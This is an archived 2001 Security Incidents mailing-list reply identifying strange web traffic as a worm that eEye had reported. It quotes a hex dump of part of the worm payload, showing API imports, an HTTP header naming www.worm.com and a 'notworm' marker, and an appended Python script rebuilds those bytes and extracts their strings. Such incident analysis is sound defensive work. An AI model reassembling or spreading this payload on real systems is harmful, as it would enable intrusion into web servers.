Security Incidents mailing list archives
Re: Strange web traffic
From: Ryan Russell <ryan () securityfocus com>
Date: Tue, 17 Jul 2001 14:03:39 -0600 (MDT)
That is indeed a worm, though you're missing the first part of the conversation. This is the worm that Marc from eEye has been posting about; I saw a post to incidents about it arrive shortly before this one, forwarded from Aleph1.

Ryan

On Tue, 17 Jul 2001, Scott Nursten wrote:
0x01c0 2aa8 4c00 33c0 c3eb ece8 f1f4 ffff 4c6f *.L.3.........Lo
0x01d0 6164 4c69 6272 6172 7941 0047 6574 5379 adLibraryA.GetSy
0x01e0 7374 656d 5469 6d65 0043 7265 6174 6554 stemTime.CreateT
0x01f0 6872 6561 6400 4372 6561 7465 4669 6c65 hread.CreateFile
0x0200 4100 536c 6565 7000 4765 7453 7973 7465 A.Sleep.GetSyste
0x0210 6d44 6566 6175 6c74 4c61 6e67 4944 0056 mDefaultLangID.V
0x0220 6972 7475 616c 5072 6f74 6563 7400 0969 irtualProtect..i
0x0230 6e66 6f63 6f6d 6d2e 646c 6c00 5463 7053 nfocomm.dll.TcpS
0x0240 6f63 6b53 656e 6400 0957 5332 5f33 322e ockSend..WS2_32.
0x0250 646c 6c00 736f 636b 6574 0063 6f6e 6e65 dll.socket.conne
0x0260 6374 0073 656e 6400 7265 6376 0063 6c6f ct.send.recv.clo
0x0270 7365 736f 636b 6574 0009 7733 7376 632e sesocket..w3svc.
0x0280 646c 6c00 0047 4554 2000 3f00 2020 4854 dll..GET..?...HT
0x0290 5450 2f31 2e30 0d0a 436f 6e74 656e 742d TP/1.0..Content-
0x02a0 7479 7065 3a20 7465 7874 2f78 6d6c 0a48 type:.text/xml.H
0x02b0 4f53 543a 7777 772e 776f 726d 2e63 6f6d OST:www.worm.com
0x02c0 0a20 4163 6365 7074 3a20 2a2f 2a0a 436f ..Accept:.*/*.Co
0x02d0 6e74 656e 742d 6c65 6e67 7468 3a20 3335 ntent-length:.35
0x02e0 3639 200d 0a0d 0a00 633a 5c6e 6f74 776f 69......c:\notwo
0x02f0 726d 004c 4d54 480d 0a3c 6874 6d6c 3e3c rm.LMTH..<html><
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
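
An added example, not part of the original post or thread: a short Python script that rebuilds the payload bytes from the hex column of the first seven rows of the dump quoted above and lists the printable names that the ASCII column splits across rows and separates with an ambiguous '.'. The function names rebuild and strings are hypothetical, and it assumes every row carries an offset, hex groups and an ASCII column.

```python
import re

# Rows copied from the dump quoted in this message (offsets 0x01c0-0x0220).
DUMP = """\
0x01c0 2aa8 4c00 33c0 c3eb ece8 f1f4 ffff 4c6f *.L.3.........Lo
0x01d0 6164 4c69 6272 6172 7941 0047 6574 5379 adLibraryA.GetSy
0x01e0 7374 656d 5469 6d65 0043 7265 6174 6554 stemTime.CreateT
0x01f0 6872 6561 6400 4372 6561 7465 4669 6c65 hread.CreateFile
0x0200 4100 536c 6565 7000 4765 7453 7973 7465 A.Sleep.GetSyste
0x0210 6d44 6566 6175 6c74 4c61 6e67 4944 0056 mDefaultLangID.V
0x0220 6972 7475 616c 5072 6f74 6563 7400 0969 irtualProtect..i
"""

def rebuild(dump):
    """Return (start_offset, payload) from 'offset hex... ascii' rows."""
    start, data = None, bytearray()
    for line in dump.splitlines():
        fields = line.split()
        if not fields:
            continue
        offset, groups, ascii_col = int(fields[0], 16), fields[1:-1], fields[-1]
        row = bytes.fromhex("".join(groups))
        if start is None:
            start = offset
        # A missing or reordered row would silently splice unrelated bytes.
        if offset != start + len(data):
            raise ValueError(f"gap or reordered row at {fields[0]}")
        # This dump shows every byte outside 0x21-0x7e as '.', so the ASCII
        # column doubles as a transcription check on the hex column.
        shown = "".join(chr(b) if 0x21 <= b <= 0x7e else "." for b in row)
        if shown != ascii_col:
            raise ValueError(f"hex and ASCII columns disagree at {fields[0]}")
        data += row
    return start, bytes(data)

def strings(start, data, min_len=4):
    """Return (offset, text) for each printable run, as strings(1) would."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [(start + m.start(), m.group().decode("ascii"))
            for m in re.finditer(pattern, data)]

if __name__ == "__main__":
    for off, text in strings(*rebuild(DUMP)):
        print(f"0x{off:04x}  {text}")
```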